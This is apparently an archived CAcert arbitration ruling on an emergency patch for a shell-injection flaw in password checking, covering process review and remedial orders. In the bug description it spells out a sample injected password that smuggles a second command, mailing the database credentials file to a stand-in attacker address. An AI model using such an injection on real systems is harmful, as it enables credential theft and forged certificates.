Before: Arbitrator Eva Stöwe, former Arbitrator Mario Lipinski (A), Respondents: Wytze R(R1), Michael T(R2), Claimant: CAcert (C), Case: a20120614.1

History Log

other persons:

SA1/2: software assessor 1/2

ST1: software tester 1

DRO: Dispute Resolution Officer

Original Dispute, Discovery (Private Part) (optional)

EOT Private Part

Dispute

From team leader CAcert critical system administrator team

> With reference to:
>   http://wiki.cacert.org/Software/Assessment/Documentation/EmergencyPatches
> I am reporting that on June 14, 2012 an emergency patch has applied
> to the webdb production server following method #2 documented in
> the webpage referenced above.
> The critical issue in case is the side effect noted in Note #3056 of
> bug report http://bugs.cacert.org/view.php?id=1070 . After discussion
> in the critical sysadmin team, we have decided that this security
> problem is too serious to leave it unpatched during the time needed
> for the regular software assessment program. Therefore the (trivial)
> patch developed by [a software assessor] has been lifted from the cacert1
> test server and has directly been applied to the production server.
> The attached mail sent to cacert-systemlog@lists.cacert.org documents
> the details of the patch process.
> 
> (team leader CAcert critical system administrator team)

(Dispute kept private until bug was set to public, because of security considerations)

Preliminary Considerations

1. possible Conflict of Interests (CoI) of A / CM?

Both A and CM are members of the software test team, that meets regularly with the software assessor team. Normally this team is involved in the process of getting Patches for bugs ready to deploy, since 2 tests are needed before a patch may normally be handed over to the critical team to for deployment. (Procedures for SoftwarePatches)

Such a test may theoretically be coming from everybody. The most important requirement for a software test is that it is documented well in the bug tracker. The requirements to contribute to the tests are low and a lot of people are members of the group that gets invitations for regular meetings. Since by this every arbitrator is a potential software tester (and most of them are doing a test now and then), to be able to find a potential CoI one has to look at an involvement of the arbitrator in the life cycle of the bug, patch and test in question. Neither A nor CM were involved in any of those steps regarding the bug in question. In the case of A the process of reviewing and testing was marked as finished before A joined the CAcert community.

No CoI can be seen for A or CM.

2. Consequences of incident from 2014-01-29

The incident was witnessed by CM and later reported to the DRO (and CM) by A. It was also documented in this case. This was done because according to our principles we aim for transparency and report incidents. Especially in the context of security issues as this case handles.

The incident itself was classified as trivial by A. A is convinced, that the acting persons had only CAcerts (and As) best interests in mind and no bad intentions were present anywhere.

A sees no need for further actions, especially no need for a dispute. Since the acting persons are not related to this case in another way, there is no need to write their names here.

3. Who should be R and C in this case

DRP 2.2

[...]
 The Arbitrator reviews the Respondents and Claimants with a view to dismissal or joining of additional parties. E.g., support personnel may be joined if emergency action was taken.
[...]

One of the first steps for an arbitrator in a case is to identify the parties of the case. While the persons mentioned in the original dispute should be considered, the arbitrator can add or remove persons from that list.

The original dispute mentions R1 as claimant and "none" as respondent. This cannot be correct, since there has to be a respondent in any case. This being CAcert if no one in special can be identified. The same is the case for the part of claimant, if a dispute is filed outside of a role and not as an individual.

The example given in the DRP is one of a support member performing an emergency action, who should be joined.

The same should be true for persons in other roles who perform emergency actions.

This is especially the case, if a review through arbitration is included into the description of an emergency process. In the original dispute such a process was mentioned. Beside of a member of the critical sysadmin team, also a member of the software-assessor team is mentioned in that process. So the according person should be a candidate to be joined to the case as well.

Being a party in a case is not a bad thing - especially not in a review case for emergency actions. On the contrary, the parties of a case gain more rights in regard of the case. For example they should be informed about the course of the case directly by A and CM.

So, when in doubt about who should be a party of a case it is in the interest of the candidates that they will be added to the list. Because of this the acting software assessor (R2) should be a party of this case.

Even as R1 originally filed the dispute, the actions under review by this case are those of him and R2 and the interest to understand what happened is on the side of CAcert. So the claimant should be CAcert and the respondents R1 and R2. However this is merely a formality. It should not change the kind and course of the case.

Discovery

Reported facts

Emergency Patch Process mentioned in the dispute:

Emergency Patch Process #2

  1. A "critical" issue has been identified (critical admin or software-assessor declares it as an emergency issue)
  2. A patch is prepared by a software-assessor, locally tested, transferred to a critical admin
  3. Critical sysadmin deploys the patch to the critical system
  4. Critical sysadmin documents the emergency patch procedure, files a dispute about an emergency issue handling under option 2
  5. The patch is entered into the update cycle process with the push replication of the critical system repository to the git repository under Software-Assessment team control
  6. The emergency patch process is reviewed by arbitration

Relevant times from bugtracker:

Deliberation

While the review process is not defined, it should probably cover:

classification of the issue for emergency action

Bug description by software team (R2)

The bug was in the function checkpw() which is used when a user sets a new password (on signup, lost password or password change) and should check whether the password is secure enough by checking several conditions like length, type of included characters etc.

One of these checks is also to do a lookup in an American English dictionary to exclude those words. To do this lookup a shell command was executed which did the lookup via standard UNIX tools. Now this shell command contained the password enclosed in single quotes so it should be interpreted as a single argument to the command doing the lookup, but that is not enough. If the password itself contains a single quote then
it pre-empts the surrounding quoting and can be interpreted as a command itself. Take for example the password:
    foo' /etc/group; mailx -s PWND eve@example.com <
/www/includes/mysql.php #

when you combine that with the shell command that's executed it becomes:
    grep 'foo' /etc/group; mailx -s PWND eve@example.com <
/www/includes/mysql.php #' /usr/share/dict/american-english

that would search for "foo" in the /etc/group file and then mail the contents of the mysql.php (which includes the database password) to the attacker. Everything after the "#" is ignored. After that, the attacker could do another attack based on the discovered credentials that modifies the database and thereby issues arbitrary certificates. So it is an arbitrary code execution attack.

There are a few things why the attack described above won't work directly:
- the server runs inside a chroot (an encapsulated environment) that doesn't contain the mailx programme, but the chroot contains a php executable so one could do a similar attack using that
- the chroot also doesn't contain a mysql executable that could be used for altering the database but that could also be circumvented by using the php executable
- $pwd is not actually the password as it's sent by the user but some escaping is applied earlier. To be precise:
    $pwd = trim(mysql_real_escape_string($USER_PASSWORD))
so some thought on what special characters can be used is probably needed but it's not an impossible task

So to summarise: with some effort an attacker could do pretty serious stuff like issuing false certificates.

Bug description from critical team (R1)

The risk of patch as outlined by Michael was that maybe certain passwords would not be accepted anymore by the system. That could be inconvenient to a very small number of users, but would not have affected system security in a negative way. But leaving the code unpatched, thus keeping open the shell escape exploit hole *deliberately*, would have left open the opportunity for serious breaches of system security. Since our code is public (as it should) anybody could have discovered this weakness by code inspection, and we wouldn't have any idea when this blackhat would decide to "hit".

The classification of the bug as "critical" so that it should be fixed fast with an emergency patch is sensible.

authorisation for the process

Critical team named Emergency Patch Process #2 as the basis for the actions that are under review.

The basis policy for softwaretam and critical team is the Security Policy (SP). This linkes to the Security Manual (SM) for further details.

In 7.4 and 7.5 SP and SM ask for at least one second review and a test before a patch is applied. This was not the case here.

The bug was classified as critical and SP/SM allow for some emergency actions beside of the normal procedures in some cases, if (later) authorised by an arbitrator. Emergency patching is not explicitely named in such a context.

SP/SM also allow team leaders to define procedures that than have to be linked in the SM. The named emergency patch process looks like if it was designed as such a procedure but it is not linked from the SM. So it is not in state.

Howere, there was a critical situation that called for some action. The general idea of the SP/SM indicates that in a critical situation some steps beside of the SP/SM may be taken if arbitration is asked for authorisation as soon as possible. This was done in the current case. Also it is better to follow a procedure, even as it is not linked to the SM correctly, than to either do nothing in a critical situation if the normal process cannot be followed or to just do anything else which may lead farther away from SP/SM than said policy.

Critical team also filed a dispute as soon as possible, to gain any missing authorisation.

Even while the Emergency Patch Process is not the correct authorisation for the actions that were done, the further review should be based on it, as the teams tried to keep to the ideas of SP/SM and said processes while being aware that they probably left their normal authorisation because of the critical situation.

review of execution of process

Even as it is not part of the described process (which it probably should be!) there should be some words for later reviews and other actions on the side of software team.

effectiveness of the emergency patch

The patch was simple and solved the problem while not being optimal.

One issue was found during the test session asked for by the Arbitrator. This issue is fixed.

Also one reviewer stated that the patch has only be considered to be ok as emergency solution and that it should be followed by something else, eventually. But this does not affect the review for an emergency patch.

problems introduced by patch

According to SA2s there were some cases where the applied patch caused certain passwords to be sent to the logfile in cleartext.

This was later fixed after the review of SA2.

lessons learned

There is no indication that there were lessons learned from the bug, the patch or the emergency-process.

But hopefully the review has helped to improve some issues that were detected.

problems encountered during the review by arbitration

Ruling

Regarding arbitration case a20120614.1[1] I come to the following ruling:

The emergency patch process #2 named from critical team as basis for the review of the patch process of bug #1070 was not followed in every detail. Some parts of communication between the teams was missing and needed documentation was either missing or insufficient. This led to a patch being installed without testing which was required by the named process.

According to SP/SM 1.4.3 processes need to be linked from the SM to be correctly installed. The process which the teams tried to follow as authorisation for leaving the normal processes and requirements for patches is not linked there. SP/SM do not define any other emergency patch process. So there was no direct authorisation by SP/SM, even when following emergency patch process #2.

But inside SP/SM a general idea regarding emergencies can be found to act fast in critical situations. In general SP/SM ask for documentation, communication between teams and review by arbitration if normal processes are not followed in cases of emergency.

So even if one keeps the details of the emergency patch process #2 out of focus, the missing elements were required: some special documentation on the side of critical team and communication about the selected patch process between the teams.

There was no communication between software and critical team about the execution of the emergency process, which could have prevented that an untested patch was installed. While the patch looks easy enough, one Software Assessor detected some issues that needed to be fixed by a later patch review.

SP/SM 5.6 declare that there should be special documentation of incidents / emergencies. Critical team presented the normal mails as documentation for the emergency installation. This is considered to be insufficient as one has to watch quite in detail to detect the emergency action within those mails - if at all.

Software team uses a bug-tracker for documentation. The documentation of #1070 was done in a manner that nobody was able to tell the review and test status, before the Arbitrator ordered another round of reviews and tests.

The Arbitrator and Case Manager of this case are regular members of current software sessions and are of the mind, that the documentation level in the bug-tracker has improved, so that this kind of issue may be resolved.

The status of patch #1070 is clarified and hopefully documented well enough through this case.

Since the teams showed the will to act according to our rules, even if they failed in details, no direct action because of the missing elements should be taken against the acting teams or team members as there is nothing that indicates those elements were missed intentionally. The same goes explicitly for the respondents of this case who are the according team leaders.

Critical and software teams should be advised to aim for better execution of emergency patches in the future.

There should be some further actions and considerations to avoid likewise problems in the future.

1. Software or Critical Team Leader should install a link to the emergency patch processes in the SM, as stated in SP/SM 1.4.3 and done for other emergency processes. While doing so, they should consider to update the emergency patch processes to also include later reviews and tests at least to the level, which is needed for non-emergency patches. They should also consider to include some kind of exploit research into the processes.

2.Critical team should install a Wiki-page (or something likewise accessible) for the documentation of special events as emergency patching.

3. Since A and CM cannot verify the current documentation within the bug-tracker from an objective point of view the internal Auditor should do a review of the documentation of current bugs in the bug-tracker to verify, if patch-review and test-status are at an acceptable and understandable state. The result of this review should be considered for further actions by the Arbitrator of this case.

4. Software team and critical team should find a way, that ensures both teams are aware of patches being installed via an emergency process.

1. - 4. should be done and reported by 2014-06-09.

Further some recommendations for issues found during this case, which are not directly covered by the dispute.

When asked for his recommendation for this case the internal auditor suggested to order some Incident Response Team to be installed.

SP/SM already ask for some incident respond precautions. For example there should be a key persons list installed. The one linked via the SM does not fit the requirements of the SM and it looks like it was not updated for some while. Since this list should be the basis for some Incident Response Team according SP/SM board and the teams are intensely advised to check and probably update said incident recovery elements, so that they match at least the requirements from SP/SM. It is also suggested to hear the internal Auditor for his ideas in this area.

One Software Assessor only gave his ACK for the patch because of it being an emergency patch. It is suggested that software team aims for a follow-up patch, soon.

There is also no indication, that anybody did any check, if there was an exploit of the bug. As this is not part of the current emergency patch process to be reviewed by this case, anything in this direction is not covered by the dispute. The Arbitrator can only suggest to either do some checks or to document why they are not needed.

Arbitration team should be advised to consider to define some guidelines how to review execution of processes as SP/SM ask for such reviews at many places.

Arbitration team should also be reminded, that emergency activity reviews could require some urgency since there may be some open points left by the acting teams which could be critical (like some patch being incomplete).

Hamburg, 2014-05-26

Execution

Changes proposed by and agreed with the Software team regarding software tests:

 1. a free-field will be added to the header of a bugtracker page. Here the test-scenarios should be described.

This should be done by the person who reports the bug, the person who enters the patch or by the software assessor who moves the patch to the testserver. Any such description should be improved if found insufficient.

 2. an additional step should be added to the patching process before a patch enters any "testing" status: "test-description added" (or something similar), so that this field should get the needed attention.

 3. Testers should not be limited to anything described in the field, but should at least cover this parts.

Last comment from A

Software and Critical team were involved in the original issue. The bigger problems were found to be on the software side. The biggest issue regarding critical team was seen to be some kind of communication.

However nearly the complete communication during the execution phase was done by critical team.

It is a little bit scary to see so little interest from the side of the software team for improvement of the processes that lead to a critical bug being on the productive system for about 1 1/2 years. To prevent something like this should be one of their core interests as they are responsible to prevent just such bugs getting there at all.

Similiar Cases

a20140422.2

Unapproved modification on Critical System

a20140625.1

Dispute against Critical

a20090810.1

Emergency code change without dual control


Arbitrations/a20120614.1 (last edited 2015-02-28 19:44:17 by EvaStöwe)